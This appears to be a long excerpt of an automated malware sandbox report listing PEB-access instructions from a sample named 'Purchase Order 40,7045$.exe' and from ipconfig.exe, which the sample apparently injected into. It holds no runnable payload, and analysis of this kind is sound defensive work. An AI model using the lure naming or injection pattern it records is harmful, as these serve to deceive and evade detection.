          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01041608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0104AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0101FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01050EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_010046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_0103FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_01058ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00F84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 1_2_00FBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\ipconfig.exe  Code function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]
